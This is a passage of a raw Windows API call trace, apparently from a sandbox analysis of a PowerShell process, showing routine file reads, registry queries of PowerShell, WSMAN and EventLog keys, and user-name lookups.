[7]=0xbd))) returned 0x0 [0068.370] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe0f04d18, Data2=0xda10, Data3=0x4699, Data4=([0]=0x89, [1]=0xfc, [2]=0xca, [3]=0x9f, [4]=0xc8, [5]=0xe2, [6]=0xd5, [7]=0x1))) returned 0x0 [0068.371] SetErrorMode (uMode=0x1) returned 0x1 [0068.371] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.371] SetErrorMode (uMode=0x1) returned 0x1 [0068.371] GetFileType (hFile=0x314) returned 0x1 [0068.371] ReadFile (in: hFile=0x314, lpBuffer=0x3c56ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c56ec0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.372] ReadFile (in: hFile=0x314, lpBuffer=0x3c56ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c56ec0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.372] ReadFile (in: hFile=0x314, lpBuffer=0x3c56ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c56ec0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.372] ReadFile (in: hFile=0x314, lpBuffer=0x3c56ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c56ec0*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.373] ReadFile (in: hFile=0x314, lpBuffer=0x3c56ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c56ec0*, lpNumberOfBytesRead=0x12cff8*=0xe98, lpOverlapped=0x0) returned 1 [0068.373] ReadFile (in: hFile=0x314, lpBuffer=0x3c564c0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c564c0*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.373] ReadFile (in: hFile=0x314, lpBuffer=0x3c56ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3c56ec0*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.374] SetErrorMode (uMode=0x1) returned 0x1 [0068.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0068.374] SetErrorMode (uMode=0x1) returned 0x1 [0068.374] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.374] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.374] CoTaskMemAlloc (cb=0x5a) returned 0x23eaa0 [0068.374] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eaa0, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.374] CoTaskMemFree (pv=0x23eaa0) [0068.374] RegCloseKey (hKey=0x314) returned 0x0 [0068.375] VirtualQuery (in: lpAddress=0x12bb20, lpBuffer=0x12c9e0, dwLength=0x30 | out: lpBuffer=0x12c9e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.375] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x75cadb8d, Data2=0x4daf, Data3=0x4249, Data4=([0]=0xad, [1]=0xa4, [2]=0xe5, [3]=0x0, [4]=0xb7, [5]=0x5f, [6]=0x73, [7]=0x70))) returned 0x0 [0068.375] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xcf2e7d15, Data2=0x738a, Data3=0x40ea, Data4=([0]=0xb5, [1]=0xf6, [2]=0x18, [3]=0x82, [4]=0x36, [5]=0x8b, [6]=0x38, [7]=0xa0))) returned 0x0 [0068.401] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.402] CoTaskMemFree (pv=0x230110) [0068.403] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.403] CoTaskMemFree (pv=0x230110) [0068.404] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.404] CoTaskMemFree (pv=0x230110) [0068.405] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.405] CoTaskMemFree (pv=0x230110) [0068.411] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.411] CoTaskMemFree (pv=0x230110) [0068.418] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.418] CoTaskMemFree (pv=0x230110) [0068.419] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.419] CoTaskMemFree (pv=0x230110) [0068.430] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d298 | out: phkResult=0x12d298*=0x314) returned 0x0 [0068.433] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d19c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d198*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.433] CoTaskMemFree (pv=0x0) [0068.434] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.434] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x282650, lpcchValueName=0x12d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0068.434] CoTaskMemFree (pv=0x282650) [0068.434] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.434] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x282650, lpcchValueName=0x12d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0068.434] CoTaskMemFree (pv=0x282650) [0068.434] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.434] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x282650, lpcchValueName=0x12d248, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d248, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0068.434] CoTaskMemFree (pv=0x282650) [0068.435] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d22c, lpData=0x0, lpcbData=0x12d228*=0x0 | out: lpType=0x12d22c*=0x1, lpData=0x0, lpcbData=0x12d228*=0x8) returned 0x0 [0068.435] CoTaskMemAlloc (cb=0xc) returned 0x1b834810 [0068.435] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d1fc, lpData=0x1b834810, lpcbData=0x12d1f8*=0x8 | out: lpType=0x12d1fc*=0x1, lpData="2.0", lpcbData=0x12d1f8*=0x8) returned 0x0 [0068.435] CoTaskMemFree (pv=0x1b834810) [0068.485] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1e8 | out: phkResult=0x12d1e8*=0x318) returned 0x0 [0068.486] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d0ec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0e8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.486] CoTaskMemFree (pv=0x0) [0068.486] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.486] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x282650, lpcchValueName=0x12d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0068.486] CoTaskMemFree (pv=0x282650) [0068.486] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.486] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x282650, lpcchValueName=0x12d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0068.486] CoTaskMemFree (pv=0x282650) [0068.486] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.486] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x282650, lpcchValueName=0x12d198, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d198, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0068.486] CoTaskMemFree (pv=0x282650) [0068.486] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d17c, lpData=0x0, lpcbData=0x12d178*=0x0 | out: lpType=0x12d17c*=0x1, lpData=0x0, lpcbData=0x12d178*=0x8) returned 0x0 [0068.486] CoTaskMemAlloc (cb=0xc) returned 0x1b834670 [0068.486] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d14c, lpData=0x1b834670, lpcbData=0x12d148*=0x8 | out: lpType=0x12d14c*=0x1, lpData="2.0", lpcbData=0x12d148*=0x8) returned 0x0 [0068.486] CoTaskMemFree (pv=0x1b834670) [0068.488] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.488] CoTaskMemFree (pv=0x230110) [0068.492] CoTaskMemAlloc (cb=0x104) returned 0x230110 [0068.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230110, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.493] CoTaskMemFree (pv=0x230110) [0068.500] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d218 | out: phkResult=0x12d218*=0x31c) returned 0x0 [0068.503] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.503] CoTaskMemFree (pv=0x0) [0068.504] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.504] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x0, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.504] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.505] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.505] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x1, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.505] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.505] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.505] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x2, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.505] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.505] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.505] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x3, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.505] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.505] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.505] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x4, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.505] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.505] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.505] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x5, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.505] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.505] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.505] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x6, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.505] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.505] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.505] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x7, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.505] CoTaskMemFree (pv=0x282650) [0068.505] CoTaskMemFree (pv=0x0) [0068.506] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.506] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x8, lpName=0x282650, lpcchName=0x12d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.506] CoTaskMemFree (pv=0x282650) [0068.506] CoTaskMemFree (pv=0x0) [0068.506] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x330) returned 0x0 [0068.506] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.506] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x348) returned 0x0 [0068.506] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.506] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x34c) returned 0x0 [0068.506] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.506] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x350) returned 0x0 [0068.506] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.506] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x354) returned 0x0 [0068.507] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.507] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x358) returned 0x0 [0068.507] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.507] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x35c) returned 0x0 [0068.507] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.507] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x360) returned 0x0 [0068.507] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x0) returned 0x2 [0068.507] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x364) returned 0x0 [0068.507] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d278 | out: phkResult=0x12d278*=0x368) returned 0x0 [0068.507] RegCloseKey (hKey=0x368) returned 0x0 [0068.508] RegCloseKey (hKey=0x31c) returned 0x0 [0068.508] RegCloseKey (hKey=0x364) returned 0x0 [0068.696] CoTaskMemAlloc (cb=0x804) returned 0x1b8508a0 [0068.696] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8508a0, nSize=0x12d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d488) returned 0x1 [0068.697] CoTaskMemFree (pv=0x1b8508a0) [0068.699] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.699] GetUserNameW (in: lpBuffer=0x282650, pcbBuffer=0x12d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4c8) returned 1 [0068.699] CoTaskMemFree (pv=0x282650) [0068.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1c8 | out: phkResult=0x12d1c8*=0x36c) returned 0x0 [0068.738] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x0) [0068.739] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.739] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x282650) [0068.739] CoTaskMemFree (pv=0x0) [0068.739] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.739] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x282650) [0068.739] CoTaskMemFree (pv=0x0) [0068.739] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.739] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x282650) [0068.739] CoTaskMemFree (pv=0x0) [0068.739] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.739] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x282650) [0068.739] CoTaskMemFree (pv=0x0) [0068.739] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.739] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x282650) [0068.739] CoTaskMemFree (pv=0x0) [0068.739] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.739] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x282650) [0068.739] CoTaskMemFree (pv=0x0) [0068.739] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.739] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.739] CoTaskMemFree (pv=0x282650) [0068.740] CoTaskMemFree (pv=0x0) [0068.740] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.740] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.740] CoTaskMemFree (pv=0x282650) [0068.740] CoTaskMemFree (pv=0x0) [0068.740] CoTaskMemAlloc (cb=0x204) returned 0x282650 [0068.740] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x282650, lpcchName=0x12d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0068.740] CoTaskMemFree (pv=0x282650) [0068.740] CoTaskMemFree (pv=0x0) [0068.740] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d228 | out: phkResult=0x12d228*=0x370) returned 0x0 [0068.740] RegOpenKeyExW (in: 